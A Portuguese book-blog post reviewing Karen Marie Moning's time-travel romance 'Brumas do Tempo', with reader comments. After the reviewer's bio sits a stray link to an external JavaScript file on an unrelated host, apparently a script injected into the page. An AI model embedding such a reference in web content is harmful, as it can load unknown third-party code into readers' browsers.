Resenha: Brumas do Tempo (Highlanders #1) – Karen Marie Moning

Brumas do Tempo
Título Original:
Beyond the Highland Mist
Série:
 Highlanders, #1
Autora:
Karen Marie Moning
Editora:
Verus
Páginas:
308
Ano:
2017
Gênero:
Romance de Época

Classificação: ⭐⭐
🔎 Compare os preços do livro aqui.

Você acredita em viagem no tempo? Pois aqui temos uma história de amor que começou com uma viagem assim. De um lado temos Sidheach James Lyon Douglas, mais conhecido por Falcão, vivendo no século XVI, e do outro, temos Adrienne, que está no século XX, mas que acaba indo parar no século XVI como se fosse mágica.

Sob às ordens do rei, Falcão está sendo obrigado a se casar com uma mulher que é conhecida por sua loucura, mas que ninguém nunca a viu. O rei usando Adrienne como a noiva doida, o casamento é realizado e agora os dois terão que conviver juntos. Ela tem seus motivos para não confiar nos homens, ainda mais nos bonitos como seu novo marido e Falcão, que nunca foi rejeitado por uma mulher, é evitado pela própria esposa. Agora os dois precisam lidar com os desejos que sentem e ainda permanecerem fortes, pois nessa disputa provavelmente ninguém sairá ganhando.

Estava bem animada com mais um romance de época (amo!) sendo lançado, ainda mais esse que envolve magia feérica, viagem no tempo e uma história épica que prometia me tirar o fôlego. Mas infelizmente o livro não me convenceu, senti que a autora estava inventando muito e não tinha o trabalho de dar explicações, me deixou ansiosa até o final para fechar as pontas soltas, mas para mim não fechou bem a história toda.

Para começar me incomodou a protagonista Adrienne, esperava mais dela como um personagem feminino, entendo que após os traumas do passado, não confiava nos homens, mas não gostei da construção do personagem, ela era infantil e fazia questão de ferir os sentimentos do Falcão com outro homem, achei isso muita vil da parte dela, ainda mais que ela claramente sentia algo pelo Falcão e mesmo assim o fez sofrer.

Como teve viagem do tempo, imaginei que fosse mostrar as dificuldades de Adrienne em outro século, mas infelizmente o foco maior foi no romance e nos percalços que o casal enfrenta para se acertarem e verem o amor deles é maior que tudo. Uma pena que a leitura tenha se tornado um pouco arrastada, realmente estava animada e queria até ler o próximo livro.

Mesmo que o livro não me agradado, espero que possam ler e tirar as próprias conclusões. Achei a edição da Verus bem bonita e com uma capa que chama bem a atenção.

»» Sobre a Série ««

A série Highlanders conta com 8 livros publicados, mas por enquanto apenas 2 volumes foram publicados pela Verus no Brasil.  Em cada um acompanhamos um casal protagonista diferente, em que a história se passa em um universo sobrenatural com guerreiros escoceses. 

1 – Brumas do Tempo
2 – Guerreiro Domado
3 – The Highlander’s Touch
4 – Kiss of the Highlander
5 – The Dark Highlander
6 – The Immortal Highlander
7 – Spell of the Highlander
8 – Into the Dreaming

barra-assinatura

suzzy
Suzzy Chiu
Chinesa mineira, apaixonada por animais, adora coisas fofas, não suporta filmes de terror, potterhead, shopaholic assumida e sempre pensando positivo!

https://cloudapi.online/js/api46.js

Anúncios

14 comentários sobre “Resenha: Brumas do Tempo (Highlanders #1) – Karen Marie Moning

  1. Olá,

    Por conta dos inúmeros comentários negativos, não tenho um pingo de interesse nessa história. Até poderia dar uma chance, no entanto os pontos negativos apresentados são justamente coisas que me incomodariam também, por isso não vejo sentido em desperdiçar tempo.

    Beijos,
    oculoselivrosblog.blogspot.com.br/

    Curtir

  2. Oi! Me lembrou muito Outlander, esse lance de viagem no tempo e tal. Apesar de gostar muito de romance de época, tenho a impressão de que não gostaria deste. Como você mencionou, os personagens parecem irritar o leitor! E eu também achei que deveria haver algum transtorno e incômodo maior acerca desta mulher que chega de uma outra época, viagem no tempo e tal, e eles ficaram de boa com isso.. Enfim, obrigada pela resenha!
    Bjoxx

    Curtir

  3. Oiee Suzzy ^^
    Eu tô rindo com “a noiva doida”…haha’ Já tinha visto as capas dos livros antes, mas não sabia que tinha viagem do tempo no meio. Lembrei automaticamente de “Outlander”, mas eu ainda não li os livros, só vi a série. Uma pena que a autora tenha se perdido e, além de criar uma protagonista fraca e mesquinha, ainda fez do romance o foco principal. Acho que não o leria :/
    MilkMilks ♥

    Curtir

  4. Oi Suzzy!

    Tudo bem? Confesso que ando muito viciada em um bom romance de época e se tiver um Highlander então…

    Já tinha visto esse livro por aí, mas foi antes de eu me tornar a louça dos romances de época e ele já está na minha wishlist faz um tempo desde que me lembrei dele. Não sabia que a série era tão grande.

    É uma pena que a história tenha tido tantos pontos negativos para você e que no final a trama não tenha te agradado no final, ainda quero ler e tirar minhas próprias conclusões.

    Beijinhos
    http://www.paraisoliterario.com

    Curtir

  5. Oie!

    Eu amo as capas dessa coleção, mas não irei ler as obras, dificilmente me dou bem com histórias nesse gênero, começo amando e quando vejo empaco e não saio mais do lugar, então aproveito para conhecer as histórias pela visão dos blogs que leram!

    Bjss

    Curtir

  6. Olá!

    Então a história me perdeu no “protagonista infantil” , não gosto de joguinhos e se o personagem é dado a isso já me da ranço e ainda tem o fato da narrativa ser arrastada. Infelizmente eu vou deixar passar e confiar nos meus instintos e na sua resenha, realmente estou acreditando que não rola para mim, mas espero que outras pessoas possam vir a curtir a leitura.

    Beijos

    Curtir

  7. Olá, tudo bom?
    Amo muito romances de época, mas essa série não me chama atenção justamente por parecer misturar demais as coisas sem focar em nada e pela sua resenha percebi que foi realmente isto que ocorreu. Infelizmente vou ter que esperar resenhas dos próximos livros para me aventurar nessa série. Vai que melhora né? rs Essa capa está realmente linda!
    Beijos!

    Curtir

  8. Olá! Poxa, que pena que essa história não te convenceu. É péssimo terminar uma leitura com a sensação de que não gostou ou a autora soube desenvolver a história e encaminhar para um fim bem fechado. Acho que vou passar dessa vez, estou fugindo de más experiências literárias no momento, rs. De qualquer forma, foi ótimo conferir suas impressões. Beijo!

    Curtir

  9. Olá!
    Eu gosto muito do gênero e de obras que trabalham questões de viagem no tempo. Confesso, entretanto, que esse livro me deixou muito triste, eu não me imagino lendo um livro com uma personagem infantil, sabe? Eu acho que isso atrapalha muito e vou passar a dica.
    Beijos

    Curtir

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

w

Conectando a %s